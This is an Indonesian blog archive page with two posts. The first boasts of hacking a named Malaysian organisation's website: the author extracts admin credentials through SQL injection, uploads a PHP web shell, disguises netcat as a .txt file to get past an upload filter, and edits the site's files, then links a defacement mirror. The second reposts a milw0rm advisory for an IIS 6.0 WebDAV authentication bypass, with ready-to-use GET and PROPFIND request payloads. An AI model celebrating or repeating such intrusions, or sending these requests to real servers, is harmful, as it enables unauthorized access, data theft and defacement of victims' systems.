Archive for May 2009

Maling is NATO…!!!

Beberapa waktu yang lalu seseorang dengan IP 124.82.126.219 [MALAYSIA - WILAYAH PERSEKUTUAN - KUALA LUMPUR - 3.167 101.7 - TM ADSL SERVICE PROVIDER MALAYSIA - GIDNET.COM] posting di shout box gw, dengan lantang dia menulis “cuba hack situs ini. http://perkim.net.my/admin/login.cfm”

WTF, Kenal juga nggak enak bener main nyuru2 gw hack situs orang yg ga’ ada urusan nya sama gw, karna ngerasa ga’ kenal & ag’ ada urusan sama tu site yaudah gw bodo amat, trus gw post “Sape lu, brani2an nyuru hack situs orang.. EEK lu ah.. dasar IDIOT” trus gw lanjutin deh kerjaan kantor gw yg lagi numpuk T_T. Beberapa jam kmudian gw cek lagi blog gw, and ternyata tu orang ngepost lagi di shoutbox gw “itu link gw..padahal lo gak bisa…. gw bagi, adminya bernama jizarul…..dapat hack lo hebat.” Damn.. makin kesel aja gw sama tu orang, Tu orang ngaku klo dia adminya, Ga’ lama kmudian trus gw cek tu link yg dikasi sambil dipenuhin rasa penasaran di ati gw ini, Seberapa hebat sih site yg dia bkin itu sampe-sampe sesumbar gitu nantang-nantangin orang suru attack sitenya.

Pas gw cek, ternyata tuh site make ColdFusion, OS Nya Windows 2000 dengan IIS 5 terinstall. Gw cek lebih jauh lagi ternyata bugsnya banyak bgt, mulai dari SQL Injection, Cross Site Scripting sampe IIS nya pun bermasalah. Karna masih bnyk kerjaan yah gw tinggalin aja deh tu web, males juga ngerjain tuh web yang katrok itu. hihihihi.. Dia fikir dia hebat kali gara-gara dia make ColdFusion.. Eeek dah..

Trus tadi siang ga’ tau knapa tiba2 inget lagi tuh gw sama kesombongan itu admin yang sesumbar nantang-nantangin orang seenaknya, Mumpung libur sambil iseng gw mulai dah ngerjain tuh web.. Damn… Hanya dalam waktu 10 menit udah berhasil gw dapetin username + password itu web.. Sial ga’ ada yang lebih susah apa.. wkwkwkwk… Coba login brosing sana-sini eh ternyata tu site bisa upload file… damn… Gw upload deh tuh php shell, and Wauw.. berhasil… hahahaha… brosing2 di dalem tu server coba2 upload netcat ternyata ga’ bisa, trus test lagi gw tanti tuh netcat ekstensinya jadi *.txt dan ternyata berhasil… hahahaha… Goblok bener tu orang…

Parah gila lemot nya tu server, jalanin netcat waiting terus… errrkk… kagak sabar akhirnya gw sudahi aja smua ini dan gw akhri dengan ngedit beberapa file mreka.. hahahaha… cape deh…

Pak cik, pak cik…
Baru bisa bkin web katrok gt kok sesumbar, Pake ColdFusion ga’ ngejamin web nya pak cik itu aman 100%… Dasar lu ah.. Terbukti lagi kan kalo maling2 itu cuma bisa sesumbar doank… Say Fuck lah buat maling2 sialan….

Nih gw kasih screenshoot nya…


Nih link nya : http://www.perkim.net.my/index.htm
Nih Mirror nya : http://www.evilc0der.com/mirror/27728/

YaDoY666 Greets : | Jack | Gblack | Don Tukulesto | n0c0py | De-Quest |

  • Share/Bookmark

Microsoft IIS 6.0 WebDAV Remote Authentication Bypass

Discovered by Kingcope - May 12th, 2009

Affected Vendors : MicrosoftAffected Products : Web Server

Vulnerability DetailsThis vulnerability allows remote attackers to bypass access restrictions on
vulnerableinstallations of Internet Information Server 6.0. The specific flaw exists within theWebDAV
 functionality of IIS 6.0. The Web Server fails to properly handle unicode tokenswhen parsing the
URI andsending back data. Exploitation of this  issue can result in thefollowing:
[[*]] Authentication bypass of password protected folders
[[*]] Listing, downloading and uploading of files into a  password protected WebDAV folder
Authentication bypass of password protected foldersAssume there is a password
protected folder in "d:\inetpub\wwwroot\protected\".
The password protection mechanism is not relevant for the attack to work.
Inside this folderthere is a file named „protected.zip“
The attacker sends a HTTP GET request to the web server.

GET /  %c0%af/protected/protected.zip HTTP/1.1         Translate: f         Connection: close         Host: servername

As seen above the URI contains the unicode character '/' (%c0%af). This unicode
character isremoved in a WebDAV request. „Translate: f“ instructs the web server to
handle the requestusing WebDAV. Using this malicious URI construct the webserver
sends the file located at„/protected/protected.zip“ back to the attacker without asking for
proper authentication.Another valid request an attacker might send to the web server is:

GET /prot%c0%afected/protected.zip HTTP/1.1         Translate: f         Connection: close         Host: servername

IIS 6.0 will remove the „%c0%af“ unicode character internally from the request and
send backthe password protected file without asking for proper credentials.
ASP scripts cannot bedownloaded in this way unless serving of script source-code is
enabled.

Listing files in a password protected WebDAV folderThe attack on WebDAV folders is
similar. The attacker can bypass the access restrictions of thepassword protected
folder and list, download, upload and modify files. The attacker sends aPROPFIND
request to the web server.

        PROPFIND /protec%c0%afted/ HTTP/1.1        Host: servername        User-Agent: neo/0.12.2
       Connection: TE        TE: trailers        Depth: 1        Content-Length: 288
       Content-Type: application/xml        

IIS responds with the directory listing of the folder without asking for a password.

Credit

This vulnerability was discovered by:
Nikolaos RangosContact: kcope2@googlemail.com
Greetings to: alex and andi

# milw0rm.com [2009-05-15]
  • Share/Bookmark